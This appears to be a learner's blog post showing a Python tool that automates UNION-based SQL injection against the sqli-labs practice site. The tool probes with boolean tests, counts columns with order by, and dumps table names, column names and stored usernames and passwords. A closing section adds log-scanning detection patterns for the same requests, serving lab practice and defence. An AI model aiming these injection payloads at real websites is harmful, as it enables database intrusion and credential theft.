Background
I've been learning cyber security for a while now. Having grown used to tools written by other people, I decided to write a fairly simple, beginner-level tool of my own to use for practice.
Demo run
1. Open a sqli-labs target environment to use as the test site.
[screenshot]
2. Get its URL: https://96e2b87c-897e-3af7-bdc1-fdfea8bde004-1.anquanlong.com/Less-1/index.php?id=1
3. Run the program.
[screenshot]
Code walkthrough
- First, check whether the site is SQL-injectable: close the quote (single or double) and compare the page under a true condition (`and 1=1`) and a false one (`and 1=2`).

```python
from bs4 import BeautifulSoup

# send_request(url) -> response body as text, log(msg) and get_prefix_url(url)
# are helpers from the author's tool that are not shown in this post.


def can_inject(text_url):
    # Try closing with a single quote (%27), then with a double quote (%22).
    text_list = ["%27", "%22"]
    for item in text_list:
        target_url1 = text_url + item + "%20" + "and%201=1%20--+"
        target_url2 = text_url + item + "%20" + "and%201=2%20--+"
        result1 = send_request(target_url1)
        result2 = send_request(target_url2)
        # sqli-labs prints the query result in the third <font> tag;
        # fonts[2] raises IndexError on a page with a different layout.
        soup1 = BeautifulSoup(result1, 'html.parser')
        fonts1 = soup1.find_all('font')
        content1 = str(fonts1[2].text)
        soup2 = BeautifulSoup(result2, 'html.parser')
        fonts2 = soup2.find_all('font')
        content2 = str(fonts2[2].text)
        # Injectable if the true condition still shows the login data
        # while the false condition shows nothing.
        if content1.find('Login') != -1 and content2.strip() == '':
            log('使用' + item + "发现数据库漏洞")  # injection found with this quote
            return True, item
        log('使用' + item + "未发现数据库漏洞")  # nothing found with this quote
    # Neither quote style worked.
    return False, None
```
- If an injection point is found, use `order by` to work out the number of columns.

```python
def text_order_by(url, symbol):
    flag = 0
    for i in range(1, 100):
        log('正在查找字段' + str(i))  # probing column i
        text_url = url + symbol + "%20order%20by%20" + str(i) + "--+"
        result = send_request(text_url)
        soup = BeautifulSoup(result, 'html.parser')
        fonts = soup.find_all('font')
        content = str(fonts[2].text)
        # The first ORDER BY value that makes the page drop its normal output
        # is one past the real column count; the later functions iterate
        # range(1, flag), which yields exactly the real columns.
        if content.find('Login') == -1:
            log('获取字段成功 -> ' + str(i) + "个字段")  # logs i, i.e. count + 1
            flag = i
            break
    return flag
```
- Once the column count is known, use a `union select` query to find which column is echoed on the page and at what position.

```python
def text_union_select(url, symbol, flag):
    prefix_url = get_prefix_url(url)
    # id=0 matches no real row, so only the UNION row is displayed.
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
    for i in range(1, flag):
        if i == flag - 1:
            text_url += str(i) + "%20--+"
        else:
            text_url += str(i) + ","
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text)
    # The first column number that appears in the output is an echoed
    # column; the text on either side of it becomes the pair of markers
    # used to cut values out of later responses.
    for i in range(1, flag):
        if content.find(str(i)) != -1:
            temp_list = content.split(str(i))
            return i, temp_list
    # No column is echoed, so UNION-based extraction will not work here.
    return None, None
```
- Identify the database by requesting the page with a broken value and reading the DBMS name out of its content.

```python
def get_database(url, symbol):
    # Append garbage after the closing quote to force a database error,
    # then look for the DBMS name in the error text.
    text_url = url + symbol + "aaaaaaaaa"
    result = send_request(text_url)
    if result.find('MySQL') != -1:
        return "MySQL"
    elif result.find('Oracle') != -1:
        return "Oracle"
    return None
```
- Get the table names.

```python
def get_tables(url, symbol, flag, index, temp_list):
    prefix_url = get_prefix_url(url)
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
    # Put group_concat(table_name) in the echoed column and plain numbers
    # elsewhere; building the list first keeps the FROM clause even when
    # the echoed column is also the last one.
    columns = []
    for i in range(1, flag):
        if i == index:
            columns.append("group_concat(table_name)")
        else:
            columns.append(str(i))
    text_url += ",".join(columns)
    text_url += "%20from%20information_schema.tables%20where%20table_schema=database()%20--+"
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text)
    # Cut the value out using the markers found by text_union_select.
    return content.split(temp_list[0])[1].split(temp_list[1])[0]
```
- Get the column names.

```python
def get_columns(url, symbol, flag, index, temp_list):
    prefix_url = get_prefix_url(url)
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
    # Same layout as get_tables, but read column_name instead; the table
    # name 'users' is hardcoded to the sqli-labs schema.
    columns = []
    for i in range(1, flag):
        if i == index:
            columns.append("group_concat(column_name)")
        else:
            columns.append(str(i))
    text_url += ",".join(columns)
    text_url += ("%20from%20information_schema.columns%20where%20"
                 "table_name='users'%20and%20table_schema=database()%20--+")
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text)
    return content.split(temp_list[0])[1].split(temp_list[1])[0]
```
- Get the column contents.

```python
def get_data(url, symbol, flag, index, temp_list):
    prefix_url = get_prefix_url(url)
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
    # 0x3a is ':' so each row comes back as id:username:password; the
    # table and column names are hardcoded to the sqli-labs schema.
    columns = []
    for i in range(1, flag):
        if i == index:
            columns.append("group_concat(id,0x3a,username,0x3a,password)")
        else:
            columns.append(str(i))
    text_url += ",".join(columns)
    text_url += '%20from%20users%20--+'
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text)
    return content.split(temp_list[0])[1].split(temp_list[1])[0]
```
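Seen from the server side, the tool's workflow leaves a very recognisable trail. The following is an added example, not code from the original post: it scans access-log lines for the exact request shapes the functions above send and reports how far each client got (quote-plus-boolean probe, `order by` enumeration, `union select`, `information_schema` dump). The log lines are constructed for the example; the IPs and path are placeholders.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed common-log-format lines mirroring the probes the tool above
# sends. The client IPs and path are placeholders, not real systems.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-1/index.php?id=1 HTTP/1.1" 200 1200
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-1/index.php?id=1%27%20and%201=1%20--+ HTTP/1.1" 200 1200
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-1/index.php?id=1%27%20and%201=2%20--+ HTTP/1.1" 200 900
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-1/index.php?id=1%27%20order%20by%204--+ HTTP/1.1" 200 950
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /Less-1/index.php?id=0%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()%20--+ HTTP/1.1" 200 1300
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /Less-1/index.php?id=2 HTTP/1.1" 200 1200
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*"')

# Stages of the tool's workflow, matched against the URL-decoded parameter
# value. Order matters: the schema dump also contains "union select".
SIGNATURES = [
    ("boolean_probe", re.compile(r"""['"]\s*and\s+1\s*=\s*[12]\s*--""", re.I)),
    ("column_count", re.compile(r"""['"]\s*order\s+by\s+\d+\s*--""", re.I)),
    ("schema_dump", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("union_select", re.compile(r"\bunion\s+select\b", re.I)),
]


def classify_request(path):
    """Return [(param, stage, decoded_value)] for each parameter matching a stage."""
    hits = []
    # parse_qs percent-decodes and turns '+' into a space, so the "--+" suffix
    # the tool sends becomes the "-- " comment the database actually saw.
    for name, values in parse_qs(urlsplit(path).query, keep_blank_values=True).items():
        for value in values:
            for stage, pattern in SIGNATURES:
                if pattern.search(value):
                    hits.append((name, stage, value))
                    break
    return hits


def scan_log(text):
    """Map client IP -> list of stages seen, in order of first appearance."""
    seen = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for _param, stage, _value in classify_request(m.group("path")):
            stages = seen.setdefault(m.group("ip"), [])
            if stage not in stages:
                stages.append(stage)
    return seen
```

A client that progresses past `boolean_probe` to `column_count` or `schema_dump` in a few seconds is the signature of an automated scanner like this one, which is a better alert than any single keyword match.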